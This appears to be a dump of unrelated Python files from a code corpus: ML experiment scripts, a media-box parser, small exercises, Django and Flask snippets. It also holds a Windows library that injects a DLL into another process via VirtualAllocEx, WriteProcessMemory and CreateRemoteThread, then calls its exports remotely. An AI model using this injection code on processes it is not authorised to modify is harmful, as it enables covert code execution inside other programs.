np.save(os.path.join(trainings_dir_path, 'model_parameter.npy'), model_parameter)
# torch.save(hyperparameter, os.path.join(trainings_dir_path, 'hyperparameter.json'))
np.save(os.path.join(trainings_dir_path, 'hyperparameter.npy'), hyperparameter)
torch.save(self.model.anchor_embeddings,
os.path.join(trainings_dir_path, 'anchor_embeddings'))
| StarcoderdataPython |
49241 | <reponame>Darklanx/rl-baselines3-zoo
"""
Run multiple experiments on a single machine.
"""
import subprocess
import numpy as np
ALGOS = ["sac"]
ENVS = ["MountainCarContinuous-v0"]
N_SEEDS = 10
EVAL_FREQ = 5000
N_EVAL_EPISODES = 10
LOG_STD_INIT = [-6, -5, -4, -3, -2, -1, 0, 1]
for algo in ALGOS:
for env_id in ENVS:
for log_std_init in LOG_STD_INIT:
log_folder = f"logs_std_{np.exp(log_std_init):.4f}"
for _ in range(N_SEEDS):
args = [
"--algo",
algo,
"--env",
env_id,
"--hyperparams",
f"policy_kwargs:dict(log_std_init={log_std_init}, net_arch=[64, 64])",
"--eval-episodes",
N_EVAL_EPISODES,
"--eval-freq",
EVAL_FREQ,
"-f",
log_folder,
]
args = list(map(str, args))
ok = subprocess.call(["python", "train.py"] + args)
| StarcoderdataPython |
60738 | <reponame>kentoku24/isobmff<filename>isobmff/iinf.py
# -*- coding: utf-8 -*-
from .box import FullBox
from .box import indent
from .box import read_box
from .box import read_int
from .box import read_string
class ItemInformationBox(FullBox):
box_type = 'iinf'
is_mandatory = False
def __init__(self, size, version, flags):
super().__init__(size=size, version=version, flags=flags)
self.item_infos = []
def __repr__(self):
rep = 'entry_count: ' + str(len(self.item_infos)) + '\n'
for item in self.item_infos:
rep += item.__repr__()
return super().__repr__() + indent(rep)
def read(self, file):
count_size = 2 if self.version == 0 else 4
entry_count = read_int(file, count_size)
for _ in range(entry_count):
box = read_box(file)
if not box:
break
if box.box_type == 'infe':
self.item_infos.append(box)
class ItemInfomationEntry(FullBox):
box_type = 'infe'
def __init__(self, size, version, flags):
super().__init__(size=size, version=version, flags=flags)
self.item_id = None
self.item_protection_index = None
self.item_name = None
self.item_extension = None
self.item_type = None
self.content_type = None
self.content_encoding = None
self.uri_type = None
def __repr__(self):
rep = 'item_id: ' + str(self.item_id) + '\n'
rep += 'item_protection_index: ' + \
str(self.item_protection_index) + '\n'
rep += 'item_name: ' + self.item_name
if self.version >= 2:
rep += '\nitem_type: ' + str(self.item_type)
return super().__repr__() + indent(rep)
def read(self, file):
if self.version == 0 or self.version == 1:
self.item_id = read_int(file, 2)
self.item_protection_index = read_int(file, 2)
self.item_name = read_string(file)
self.content_type = read_string(file)
self.content_encoding = read_string(file)
if self.version == 1:
extension_type = read_string(file, 4)
fdel = FDItemInfoExtension()
fdel.read(file)
self.item_extension = fdel
elif self.version >= 2:
if self.version == 2:
self.item_id = read_int(file, 2)
elif self.version == 3:
self.item_id = read_int(file, 4)
self.item_protection_index = read_int(file, 2)
self.item_type = read_string(file, 4)
self.item_name = read_string(file)
if self.item_type == 'mime':
self.content_type = read_string(file)
self.content_encoding = read_string(file)
elif self.item_type == 'uri ':
self.uri_type = read_string(file)
class FDItemInfoExtension(object):
def __init__(self):
self.content_location = None
self.content_md5 = None
self.content_length = None
self.transfer_length = None
self.group_ids = []
def read(self, file):
"""read"""
self.content_location = read_string(file)
self.content_md5 = read_string(file)
self.content_length = read_int(file, 8)
self.transfer_length = read_int(file, 8)
entry_count = read_int(file, 1)
for _ in range(entry_count):
group_id = read_int(file, 4)
self.group_ids.append(group_id)
| StarcoderdataPython |
100518 |
def kIsClicked():
print("Character moves right ")
def hUsClikced():
print("Charater moves left")
keepGoing = True
#boolean = 뭐냐면 TRUE 또는 False냐의 변수
while True:
userInput = input("which number do you want to choose? (1~9) type 9 ")
if userInput == "k":
kIsClicked()
elif userInput == "9":
print("Finished")
break
else:
break
| StarcoderdataPython |
3270553 | from django.db import transaction
from django.core.management.base import BaseCommand
import json
from binascii import hexlify
from simplecrypt import encrypt
from events.models import Event
from events.tasks import encrypt_event
class Command(BaseCommand):
help = 'Exports emails for campaigns - temp fix.'
def add_arguments(self, parser):
parser.add_argument('poll_id', nargs='+', type=int)
def handle(self, *args, **options):
total = Event.objects.count()
c = 0
for e in Event.objects.all():
c += 1
encrypt_event.delay(e.pk, c, total)
| StarcoderdataPython |
1737326 | # -*- coding: utf-8 -*-
import mock
from h.viewpredicates import FeaturePredicate
class TestFeaturePredicate(object):
def test_text(self):
predicate = FeaturePredicate('foo', mock.sentinel.config)
assert predicate.text() == 'feature = foo'
def test_phash(self):
predicate = FeaturePredicate('foo', mock.sentinel.config)
assert predicate.phash() == 'feature = foo'
def test__call__(self):
request = mock.Mock(spec_set=['feature'])
predicate = FeaturePredicate('bar', mock.sentinel.config)
result = predicate(mock.sentinel.context, request)
request.feature.assert_called_once_with('bar')
assert result == request.feature.return_value
| StarcoderdataPython |
3301554 | <filename>Email Slicer/email_slicer.py
email = input('Enter you email: ').strip()
username = email[:email.index('@')]
domain = email[email.index('@') + 1:]
print(f"Your username is {username} and your domain name is {domain}") | StarcoderdataPython |
1676943 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun May 2 10:28:33 2021
@author: venkateshprasads
Input: nums = [2,7,11,15], target = 9
Output: [0,1]
Output: Because nums[0] + nums[1] == 9, we return [0, 1].
"""
class solution:
def __init__(self,nums,target):
self.nums=nums
self.target=target
def twoSum(self, nums: 'list', target: int) -> 'list':
for i in range(len(nums)-1):
#print(i,len(nums))
j=0
if i != len(nums):
for j in range(len(nums)-1):
#print(i,j)
if ((nums[i] + nums[j+1]) == target):
lst = [i , j+1]
return lst
j=j+1
a=solution.twoSum('vale',[2,7,11,15], 9)
print(a)
| StarcoderdataPython |
48643 | # encoding: utf-8
"""
This program is free software. It comes without any warranty, to
the extent permitted by applicable law. You can redistribute it
and/or modify it under the terms of the Do What The Fuck You Want
To Public License, Version 2, as published by Sam Hocevar. See
http://sam.zoy.org/wtfpl/COPYING for more details.
TODO: Make this not suck.
"""
import os
from _ctypes import FUNCFLAG_CDECL as _FUNCFLAG_CDECL,\
FUNCFLAG_STDCALL as _FUNCFLAG_STDCALL,\
FUNCFLAG_PYTHONAPI as _FUNCFLAG_PYTHONAPI,\
FUNCFLAG_USE_ERRNO as _FUNCFLAG_USE_ERRNO,\
FUNCFLAG_USE_LASTERROR as _FUNCFLAG_USE_LASTERROR
from _kernel32 import PLoadLibraryW as PLoadLibrary
from extern import pefile
import functools
from _kernel32 import *
from struct import calcsize as _calcsz
# Utility stuff (decorators/base classes/functions)
def memoize(obj):
"""
From the Python Decorator Library (http://wiki.python.org/moin/PythonDecoratorLibrary):
Cache the results of a function call with specific arguments. Note that this decorator ignores **kwargs.
"""
cache = obj.cache = {}
@functools.wraps(obj)
def memoizer(*args, **kwargs):
if args not in cache:
cache[args] = obj(*args, **kwargs)
return cache[args]
return memoizer
def _find_parent_process():
"""
Obtain the process and thread identifiers of the parent process.
BOOL get_parent_process( LPPROCESS_INFORMATION ppi )
{
HANDLE hSnap;
PROCESSENTRY32 pe;
THREADENTRY32 te;
DWORD id = GetCurrentProcessId();
BOOL fOk;
hSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS|TH32CS_SNAPTHREAD, id );
if (hSnap == INVALID_HANDLE_VALUE)
return FALSE;
find_proc_id( hSnap, id, &pe );
if (!find_proc_id( hSnap, pe.th32ParentProcessID, &pe ))
{
CloseHandle( hSnap );
return FALSE;
}
te.dwSize = sizeof(te);
for (fOk = Thread32First( hSnap, &te ); fOk; fOk = Thread32Next( hSnap, &te ))
if (te.th32OwnerProcessID == pe.th32ProcessID)
break;
CloseHandle( hSnap );
ppi->dwProcessId = pe.th32ProcessID;
ppi->dwThreadId = te.th32ThreadID;
return fOk;
}
"""
pid = GetCurrentProcessId()
hSnap = CreateToolhelp32Snapshot(PROC_THREAD_SNAPSHOT, 0)
if hSnap == NULL:
raise WinError('Could not create a Toolhelp32Snapshot')
(fOk, pe) = _find_proc_id(hSnap, pid)
if fOk == FALSE:
raise WinError('Could not find current proc')
ppid = pe.th32ParentProcessID
fOk, ppe = _find_proc_id(hSnap, ppid)
if fOk == FALSE:
raise WinError('Could not find parent proc id')
te = THREADENTRY32()
te.dwSize = SZTHREADENTRY
fOk = Thread32First(hSnap, byref(te))
while fOk != FALSE:
if te.th32OwnerProcessID == ppe.th32ProcessID: break
fOk = Thread32Next(hSnap, byref(te))
if fOk == FALSE:
raise WinError('Could not find thread.')
CloseHandle(hSnap)
return ppe.th32ProcessID, te.th32ThreadID
def _find_proc_id(hSnap, pid):
"""
Search each process in the snapshot for id.
BOOL find_proc_id( HANDLE snap, DWORD id, LPPROCESSENTRY32 ppe )
{
BOOL fOk;
ppe->dwSize = sizeof(PROCESSENTRY32);
for (fOk = Process32First( snap, ppe ); fOk; fOk = Process32Next( snap, ppe ))
if (ppe->th32ProcessID == id)
break;
return fOk;
}
"""
ppe = PROCESSENTRY32()
ppe.dwSize = SZPROCESSENTRY
fOk = Process32First(hSnap, byref(ppe))
while fOk != FALSE:
if ppe.th32ProcessID == pid: break
fOk = Process32Next(hSnap, byref(ppe))
return fOk, ppe
def _bypid(pid):
"""
Find a process and it's main thread by its process ID.
"""
hSnap = CreateToolhelp32Snapshot(PROC_THREAD_SNAPSHOT, 0)
if hSnap == NULL: raise WinError('Could not create a Toolhelp32Snapshot')
(fOk, pe) = _find_proc_id(hSnap, pid)
if fOk == FALSE: raise WinError('Could not find process by id: %d' % pid)
# Find the thread
te = THREADENTRY32()
te.dwSize = SZTHREADENTRY
fOk = Thread32First(hSnap, byref(te))
while fOk != FALSE:
if te.th32OwnerProcessID == pe.th32ProcessID: break
fOk = Thread32Next(hSnap, byref(te))
if fOk == FALSE: raise WinError('Could not find thread.')
CloseHandle(hSnap)
return pe.th32ProcessID, te.th32ThreadID
def _pack_args(*args):
""" Pack multiple arguments into """
class _Args(Structure): pass
fields = []
for i, arg in enumerate(args):
fields.append(('arg%d' % i, type(arg),))
_Args._fields_ = fields
Args = _Args()
for i, arg in enumerate(args):
try:
setattr(Args, 'arg%d' % i, arg)
except:
try:
setattr(Args, 'arg%d' % i, arg.value)
except:
setattr(Args, 'arg%d' % i, arg.contents)
return Args
_szp1 = lambda a: len(a) + 1
def _isptr(typ):
return hasattr(typ, '_type_') and (typ._type_ == 'P' or type(typ._type_) != str)
def _pynumtyp2ctype(arg, typ=None):
if typ is None: typ = type(arg)
if typ == int:
if arg < 0:
#ctyp = c_short
#if arg > c_short_max or arg < c_short_min:
ctyp = c_int
if arg > c_int_max or arg < c_int_min:
ctyp = c_longlong if arg > c_long_max or arg < c_long_min else c_long
return ctyp
else:
#ctyp = c_ushort
#if arg > c_ushort_max:
ctyp = c_uint
if arg > c_uint_max:
ctyp = c_ulonglong if arg > c_ulong_max else c_ulong
return ctyp
elif typ == long:
if arg < 0:
return c_longlong if arg > c_long_max or arg < c_long_min else c_long
else:
return c_ulonglong if arg > c_ulong_max else c_ulong
elif typ == float:
ctyp = c_float
try: result = ctyp(arg)
except:
ctyp = c_double
try: result = ctyp(arg)
except: ctyp = c_longdouble
return ctyp
else:
raise Exception('Arg doesnt appear to be a number-type.. Arg: %s Type: %s' % (str(arg), str(typ)))
def _carrtype(val, typ, size, num=True):
buf = typ()
larg = len(val) - 1
for i in range(0, size - 1):
if i > larg: continue
if type(val[i]) in [str, unicode] and num:
val[i] = ord(val[i])
buf[i] = val[i]
return buf
def _pychars2ctype(arg, size = None, typ=None):
if typ is None: typ = type(arg)
if size is None: size = len(arg)
if typ == str:
return c_char_p, create_string_buffer(arg, size)
elif typ == unicode:
return c_wchar_p, create_unicode_buffer(arg, size)
elif typ == buffer:
#noinspection PyTypeChecker
argtype = c_ubyte * size
return argtype, _carrtype(list(arg), argtype, size)
elif typ == bytearray:
size += 1
#noinspection PyTypeChecker,PyUnresolvedReferences
argtype = c_byte * size
return argtype, _carrtype(list(arg), argtype, size - 1)
def py2ctype(arg):
""" TODO: Use this in the allocation/argtype stuff in RCFuncPtr """
typ = type(arg)
if typ in [str, unicode, buffer, bytearray]:
ctyp, cval = _pychars2ctype(arg, typ=typ)
return cval
elif typ in [ int, long, float ]:
ctyp = _pynumtyp2ctype(arg, typ)
return ctyp(arg)
elif typ in [list, set, tuple]:
arg = list(arg)
size = len(arg) + 1
argtype = c_int
numtyp = True
# Only going to handle collections of strings, unicode strings, and numbers
for argi in arg:
typ = type(argi)
if typ in [ str, unicode ]:
argtype, dummy = _pychars2ctype(argi, typ=typ)
numtyp = False
break
elif typ in [ long, int, float ]:
argtype = _pynumtyp2ctype(argi, typ)
if typ == float: numtyp = False
break
return _carrtype(arg, argtype * size, size, num=numtyp)
else:
raise Exception('Dont know what to do with arg.\nArg: %s\nType: %s' % (arg, type(arg)))
class _RCFuncPtr(object):
_addr_ = 0
_flags_ = None
_restype_ = None
_funcptr_ = None
_hprocess_ = None
def _valueof(self, arg):
if not hasattr(arg, '_type_'):
return arg
elif hasattr(arg, 'value'):
return arg.value
elif hasattr(arg, 'contents'):
return arg.contents
else:
return arg
#raise Exception('Don\'t know how to get the value of arg.\nType: %s' % type(arg))
def _valtoargtype(self, arg, argtype):
result = 0
if type(arg) in [str, unicode]:
if argtype == c_char_p:
result = create_string_buffer(arg, len(arg) + 1)
elif argtype == c_wchar_p:
result = create_unicode_buffer(arg, len(arg) + 1)
elif argtype._type_ == c_ubyte:
result = (c_ubyte * len(arg) + 1)()
for i, c in enumerate(arg):
result[i] = c
else:
raise Exception('Don\'t know how to convert string, "%s" into type: %s' % (arg, argtype))
# Array type
elif hasattr(argtype, '_length_')\
or type(argtype._type_) != str: # Pointer type
try:
result = cast(arg, argtype)
except:
result = arg
elif hasattr(argtype, 'value'):
try: result = argtype(arg)
except: result = arg
else:
try: result = cast(arg, c_void_p)
except: result = arg
#raise Exception('Don\'t know how to convert arg to argtype.\nArg: %s\nArgtype: %s' % (arg, argtype))
return result
def _alloc_set_var(self, val):
"""
BOOL alloc_set_varA(LPCSTR* buffer, HANDLE hProcess, LPCSTR val)
{
SIZE_T buflen = (lstrlen(val) + 1) * sizeof(const char);
if (!(*buffer = (LPCSTR) VirtualAllocEx(hProcess, NULL, buflen, MEM_COMMIT, PAGE_READWRITE)))
return_error("Could not allocate memory for our test call.");
if (!WriteProcessMemory(hProcess, (LPVOID)*buffer, (LPCVOID)val, (SIZE_T)buflen, NULL))
return_error("Could write to our remote variable..");
return TRUE;
}
"""
buflen = sizeof(val)
buffer = VirtualAllocEx(self._hprocess_, 0L, buflen, MEM_COMMIT, PAGE_READWRITE)
if buffer == NULL:
raise Exception('Could not allocate our remote buffer.')
try:
if WriteProcessMemory(self._hprocess_, LPCVOID(buffer), val, buflen, ULONG_PTR(0)) == FALSE:
raise Exception('Could not write to our remote variable.')
except ArgumentError:
if WriteProcessMemory(self._hprocess_, LPCVOID(buffer), addressof(val), buflen, ULONG_PTR(0)) == FALSE:
raise Exception('Could not write to our remote variable.')
return buffer
def __call__(self, *more): # real signature unknown; restored from __doc__
""" x.__call__(...) <==> x(...) """
funcptr = self._funcptr_
result = DWORD(0L) if not hasattr(funcptr, 'restype') or funcptr.restype is None else funcptr.restype()
lpParameter = NULL
if not hasattr(funcptr, 'noalloc') or not funcptr.noalloc:
if funcptr.argtypes is not None and len(funcptr.argtypes) > 0:
args = []
argcount = len(more)
for i, argtype in enumerate(funcptr.argtypes):
arg = 0
if i >= argcount:
arg = argtype()
elif hasattr(more[i], '_type_'):
if more[i]._type_ == argtype:
arg = more[i]
else:
arg = self._valtoargtype(self._valueof(more[i]), argtype)
else:
arg = self._valtoargtype(more[i], argtype)
args.append(arg)
if argcount > 1:
lpParameter = _pack_args(*args)
else:
lpParameter = args[0]
if hasattr(lpParameter, '_b_needsfree_') and lpParameter._b_needsfree_ == 1 and bool(lpParameter):
lpParameter = self._alloc_set_var(lpParameter)
elif len(more) > 0:
if len(more) == 1:
lpParameter = cast(more[0], c_void_p)
else:
tlen = len(self.argtypes) if hasattr(self, 'argtypes') else 0
more = list(more)
for i, arg in enumerate(more):
if i > tlen: more[i] = py2ctype(arg)
else:
typ = self.argtypes[i]
if typ == c_char_p:
more[i] = create_string_buffer(arg)
elif typ == c_wchar_p:
more[i] = create_unicode_buffer(arg)
elif _isptr(typ):
more[i] = cast(arg,typ)
else:
more[i] = self.argtypes[i](arg)
lpParameter = _pack_args(*more)
hRemoteThread = CreateRemoteThread(
self._hprocess_, NULL_SECURITY_ATTRIBUTES, 0,
cast(self._addr_, LPTHREAD_START_ROUTINE),
lpParameter, 0L, byref(c_ulong(0L))
)
if hRemoteThread == NULL:
if hasattr(lpParameter, '_b_needsfree_') and lpParameter._b_needsfree_ == 1 and bool(lpParameter):
VirtualFreeEx(self._hprocess_, lpParameter, 0, MEM_RELEASE)
CloseHandle(self._hprocess_)
raise WinError('Failed to start our remote thread.')
WaitForSingleObject(hRemoteThread, INFINITE)
GetExitCodeThread(hRemoteThread, cast(byref(result), LPDWORD))
CloseHandle(hRemoteThread)
if hasattr(lpParameter, '_b_needsfree_') and lpParameter._b_needsfree_ == 1 and bool(lpParameter):
VirtualFreeEx(self._hprocess_, lpParameter, 0, MEM_RELEASE)
return result
def __init__(self, offset, funcid, rdll):
self._addr_ = offset
if self._flags_ == _FUNCFLAG_CDECL:
self._funcptr_ = CFUNCTYPE(self._restype_)
elif self._flags_ == _FUNCFLAG_STDCALL:
self._funcptr_ = WINFUNCTYPE(self._restype_)
elif self._flags_ == _FUNCFLAG_PYTHONAPI:
self._funcptr_ = PYFUNCTYPE(self._restype_)
self._funcptr_._func_flags_ = self._flags_
def __nonzero__(self):
""" x.__nonzero__() <==> x != 0 """
return self._funcptr_.__nonzero__()
def __repr__(self): # real signature unknown; restored from __doc__
""" x.__repr__() <==> repr(x) """
return self._funcptr_.__repr__()
@memoize
def _has(self, key): return key in dir(_RCFuncPtr)
def __setattr__(self, key, value):
if self._has(key):
super(_RCFuncPtr, self).__setattr__(key, value)
else:
setattr(self._funcptr_, key, value)
def __getattr__(self, key):
return super(_RCFuncPtr, self).__getattr__(key) if\
self._has(key) else\
getattr(self._funcptr_, key)
class RCDLL(object):
_func_flags_ = _FUNCFLAG_CDECL
_func_restype_ = c_int
_hprocess_ = 0
_hthread_ = 0
_exports_ = {}
_funcs_ = {}
def __init__(self, name = None, pid = 0, thid = 0, mode = DEFAULT_MODE, handle = None, use_errno = False,
use_last_error = False):
if name is None and handle is None:
raise WindowsError('We need either a name or a handle to a preloaded DLL to create a DLL interface.')
elif name is None:
self._name = GetModuleFileName(handle)
else:
self._name = name
flags = self._func_flags_
if use_errno:
flags |= _FUNCFLAG_USE_ERRNO
if use_last_error:
flags |= _FUNCFLAG_USE_LASTERROR
self._hthread_ = thid
pi, ti = 0, 0
if pid == 0:
check = _find_parent_process()
if check is None:
raise WinError('Failed to open our parent process and no pid specified.')
pi, ti = check
else:
pi, ti = _bypid(pid)
if self._hthread_ == 0:
self._hthread_ = ti
self._hprocess_ = OpenProcess(PROCESS_MOST, FALSE, pi)
class _FuncPtr(_RCFuncPtr):
_flags_ = flags
_restype_ = self._func_restype_
_hprocess_ = self._hprocess_
self._FuncPtr = _FuncPtr
self._handle = self.__inject__()
if self._handle == 0:
raise WindowsError('Could not inject your library: %s' % self._name)
self.__populate_exports__()
def __inject__(self):
val = create_unicode_buffer(self._name, len(self._name) + 1)
buflen = sizeof(val)
buffer = VirtualAllocEx(self._hprocess_, 0L, buflen, MEM_COMMIT, PAGE_READWRITE)
if buffer == NULL:
raise Exception('Could not allocate our remote buffer.')
if WriteProcessMemory(self._hprocess_, buffer, cast(val, LPCVOID), buflen, ULONG_PTR(0)) == FALSE:
raise Exception('Could not write to our remote variable.')
hRemoteThread = CreateRemoteThread(
self._hprocess_, NULL_SECURITY_ATTRIBUTES, 0,
PLoadLibrary, buffer, 0L, byref(c_ulong(0L))
)
if hRemoteThread == NULL:
VirtualFreeEx(self._hprocess_, buffer, 0, MEM_RELEASE)
CloseHandle(self._hprocess_)
raise WinError('Failed to start our remote thread.')
WaitForSingleObject(hRemoteThread, INFINITE)
result = c_ulong(0)
GetExitCodeThread(hRemoteThread, byref(result))
CloseHandle(hRemoteThread)
VirtualFreeEx(self._hprocess_, buffer, 0, MEM_RELEASE)
return result.value
def __populate_exports__(self):
if len(os.path.splitext(self._name)[1].lower()) == 0:
self._name += '.dll'
pe = pefile.PE(self._name, fast_load = True)
direxport = pe.OPTIONAL_HEADER.DATA_DIRECTORY[0]
exportsobj = pe.parse_export_directory(direxport.VirtualAddress, direxport.Size)
pe.close()
for export in exportsobj.symbols:
self._exports_[export.name] =\
self._exports_[export.ordinal] =\
self._handle + export.address
def __repr__(self):
return "<%s '%s', handle %x at %x>" %\
(self.__class__.__name__, self._name,
(self._handle & (_sys.maxint * 2 + 1)),
id(self) & (_sys.maxint * 2 + 1))
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
raise AttributeError(name)
func = self.__getitem__(name)
super(RCDLL, self).__setattr__(name, func)
self._funcs_[name] = func
#setattr(self, name, func)
return func
def __setattr__(self, key, value):
if key in self._exports_.keys():
self._funcs_[key] = value
else:
super(RCDLL, self).__setattr__(key, value)
def __getitem__(self, name_or_ordinal):
if name_or_ordinal in self._funcs_.keys():
return self._funcs_[name_or_ordinal]
ordinal = isinstance(name_or_ordinal, (int, long))
if not self._exports_.has_key(name_or_ordinal):
if ordinal: raise WindowsError('Could not find address of function at ordinal: %d' % name_or_ordinal)
else: raise WindowsError('Could not find address of function named: %s' % name_or_ordinal)
func = self._FuncPtr(self._exports_[name_or_ordinal], name_or_ordinal, self)
if not ordinal:
func.__name__ = name_or_ordinal
return func
class RPyDLL(RCDLL):
"""This class represents the Python library itself. It allows to
access Python API functions. The GIL is not released, and
Python exceptions are handled correctly.
"""
_func_flags_ = _FUNCFLAG_CDECL | _FUNCFLAG_PYTHONAPI
class RWinDLL(RCDLL):
"""This class represents a dll exporting functions using the
Windows stdcall calling convention.
"""
_func_flags_ = _FUNCFLAG_STDCALL
rcdll = LibraryLoader(RCDLL)
rwindll = LibraryLoader(RWinDLL)
rpydll = LibraryLoader(RPyDLL)
if __name__ == '__main__':
testdll = RCDLL('testdll.dll')
Initialize = testdll.Initialize
Initialize.restype = None
Initialize.argtypes = []
Initialize()
testdll.Finalize()
| StarcoderdataPython |
3380222 | <reponame>fredricksimi/leetcode
"""
Knapsack Problem:
You're given an array of arrays where each subarray holds two integer values and represents an item;
the first integer is the item's value, and the second integer is the item's weight.
You're also given an integer representing the maximum capacity of a knapsack that you have.
Your goal is to fit items in your knapsack without having the sum of their weights exceed the knapsack's capacity,
all the while maximizing their combined value. Note that you only have one of each item at your disposal.
Write a function that returns the maximized combined value of the items that you should pick as well as an array of the indices of each item picked.
If there are multiple combinations of items that maximize the total value in the knapsack, your function can return any of them.
https://www.algoexpert.io/questions/Knapsack%20Problem
"""
# O(2^n) time | O(n) space
def knapsackProblem(items, capacity, idx=0, added=[]):
if idx >= len(items):
return [0, added]
curr_weight = items[idx][1]
curr_value = items[idx][0]
if curr_weight > capacity:
result = knapsackProblem(items, capacity, idx+1, added) # skip current
else:
# add current to knapsack
not_skip = knapsackProblem(
items, capacity-curr_weight, idx+1, added + [idx])
not_skip[0] = curr_value + not_skip[0]
skip = knapsackProblem(items, capacity, idx+1, added) # skip current
if skip[0] > not_skip[0]:
result = skip
else:
result = not_skip
return result
| StarcoderdataPython |
3315217 | interaction_model = "stream"
def bidirectional(stream):
return (item.upper() for item in stream)
def filter(stream):
return (item for item in stream if "foo" in item)
def source():
from itertools import count
return(str(item) for item in count())
| StarcoderdataPython |
4802037 | from flask import render_template,request,redirect,url_for
from . import main
from app.request import getRequest
rqst = getRequest()
@main.route('/')
def index():
'''
Highlight root page function that returns the index page and its data
'''
sources = rqst.get_sources('tech')
if sources:
return render_template("index.html", sources=sources)
@main.route('/view/<int:view_id>')
def view(id):
'''
news root page function that returns the index page and its data
'''
| StarcoderdataPython |
152858 | <reponame>hadleyhzy34/GANs-practice
# -*- coding: utf-8 -*-
import torch.nn as nn
class discriminator(nn.Module):
def __init__(self):
super(discriminator, self).__init__()
self.main = nn.Sequential(
nn.Linear(784, 256),
nn.LeakyReLU(0.2),
nn.Linear(256, 256),
nn.LeakyReLU(0.2),
nn.Linear(256, 1),
nn.Sigmoid()
)
def forward(self, input):
return self.main(input)
class generator(nn.Module):
def __init__(self):
super(generator, self).__init__()
self.main = nn.Sequential(
nn.Linear(128, 1024),
nn.ReLU(),
nn.Linear(1024, 1024),
nn.ReLU(),
nn.Linear(1024, 784),
nn.Tanh()
)
def forward(self, input):
return self.main(input)
| StarcoderdataPython |
3326869 | from statzcw import zvariance
from math import sqrt
def stddev(in_list):
"""
Calculates standard deviation of given list
:param in_list: list of values
:return: float rounded to 5 decimal places
"""
var = zvariance.variance(in_list)
std_dev = sqrt(var)
return round(std_dev, 5)
| StarcoderdataPython |
151824 | <reponame>hitchtest/hitchstory<gh_stars>10-100
def email_was_sent():
print("Email was sent")
| StarcoderdataPython |
3271763 | <filename>pyecs/__init__.py
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from entity import Entity
from events import Events
from component import Component
from .decorators import *
from . import components
from application import Application, profile
version = "0.0.11" | StarcoderdataPython |
1618704 | <filename>src/prostatex/preprocessing.py
import numpy
from numpy import pad
import math
from constants import Variables
from prostatex.model import Image
from prostatex.normalization import NormalizationMean, NormalizationFeatureScaling, NormalizationMedian
from scipy.ndimage.interpolation import zoom
def roi_mm(image: Image, image_data: numpy.ndarray, ij_width: float, k_width: float, do_interpolate=False):
i, j, k = image.ijk()
i, j, k = i, j, k
ivs, jvs, kvs = image.spacing()
i_margin = int(math.ceil(ij_width / (2 * ivs))) + Variables.width_crop
j_margin = int(math.ceil(ij_width / (2 * jvs))) + Variables.width_crop
k_margin = int(math.floor(k_width / (2 * kvs))) + Variables.depth_crop
image_data = pad(image_data, ((i_margin, i_margin), (j_margin, j_margin), (k_margin, k_margin)), mode='constant')
img_shape = image_data.shape
i_from = max(0, i)
i_to = min(img_shape[0], i + 2 * i_margin)
j_from = max(0, j)
j_to = min(img_shape[1], j + 2 * j_margin)
k_from = max(0, k)
k_to = min(img_shape[2], k + 2 * k_margin +1)
if k_margin == 0:
roi_arr = image_data[i_from:i_to, j_from:j_to, min(img_shape[2]-1,k_from)]
return roi_arr[:,:,None] # add additional dimension to array
return image_data[i_from:i_to, j_from:j_to, k_from:k_to]
def clean_outliers(image_img):
perc_bounds = numpy.percentile(image_img, [1, 99])
p_low = perc_bounds[0]
p_high = perc_bounds[1]
image_img[image_img <= p_low] = p_low
image_img[image_img >= p_high] = p_high
return image_img
def get_roi_in_mm(model,modality,ij_width_mm=30,k_width_mm=0, do_interpolate=False):
try:
if modality in model.images:
image = model.images[modality]
image_img = image.imgdata()
image_img = clean_outliers(image_img)
#image_img = NormalizationMean().normalize(image_img)
image_img = NormalizationMedian().normalize(image_img)
image_img = NormalizationFeatureScaling(vmin=0.0,vmax=1.0).normalize(image_img)
img = roi_mm(image,image_img,ij_width_mm,k_width_mm, do_interpolate)
if do_interpolate:
zoom_factor = [ z/min(image.spacing()) for z in image.spacing()]
img = zoom(img, zoom_factor)
return img
except Exception as e:
print(model.id(), modality, e)
return None
def pad_zero(matrix, target_shape):
pads = []
matrix_update = matrix.copy()
if matrix is None:
return numpy.zeros(shape=target_shape)
for n in range(len(matrix.shape)):
dim = matrix.shape[n]
target_dim = target_shape[n]
dim_pad_lo = int(numpy.floor((target_dim-dim)/2))
dim_pad_hi = int(numpy.ceil((target_dim-dim)/2))
if dim_pad_lo < 0 or dim_pad_hi < 0:
from_lo = abs(dim_pad_lo)
from_high = abs(dim_pad_hi)
indices = range(0,dim)[from_lo:-from_high]
matrix_update = numpy.take(matrix_update,indices,axis=n)
#print('pad_zero',matrix.shape,target_shape)
for n in range(len(matrix_update.shape)):
dim = matrix_update.shape[n]
target_dim = target_shape[n]
dim_pad_lo = int(numpy.floor((target_dim-dim)/2))
dim_pad_hi = int(numpy.ceil((target_dim-dim)/2))
pads.append((dim_pad_lo, dim_pad_hi))
return pad(matrix_update, pads, mode='constant')
| StarcoderdataPython |
3211867 | from .api.client import OpenFinClient
from .api.key import SubKey
from .exceptions import OpenFinWebSocketException
__VERSION__ = "0.1.0"
| StarcoderdataPython |
189383 | def user_selection(message, options):
# taken from https://github.com/Asana/python-asana/blob/master/examples/example-create-task.py
option_list = list(options)
print(message)
for i, option in enumerate(option_list):
print(i, ": " + option["name"])
index = int(input("Enter choice (default 0): ") or 0)
return option_list[index]
| StarcoderdataPython |
63703 | # coding:utf-8
import csv
from bs4 import BeautifulSoup
import requests
if __name__ == '__main__':
user_agent = 'Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1'
headers = {'User-Agent': user_agent}
r = requests.get('http://seputu.com/', headers=headers)
soup = BeautifulSoup(r.text, 'html.parser')
lisit = []
for mulu in soup.find_all(class_='mulu'):
h2 = mulu.find('h2')
if h2 != None:
h2_title = h2.string
for a in mulu.find(class_='box').find_all('a'):
href = a.get('href')
box_title = a.string
lisit.append((h2_title, box_title, href))
headers_ = {'标题', '章节名', '链接'}
with open('qiye.csv', 'w', newline='') as fp:
# csv需要指定newline,否则每行数据之间都有空行
f_csv = csv.writer(fp)
f_csv.writerow(headers_)
f_csv.writerows(lisit)
| StarcoderdataPython |
172767 | from .value_empty import ValueEmpty | StarcoderdataPython |
3303074 | #!/usr/bin/env python
#-*- coding: utf-8 -*-
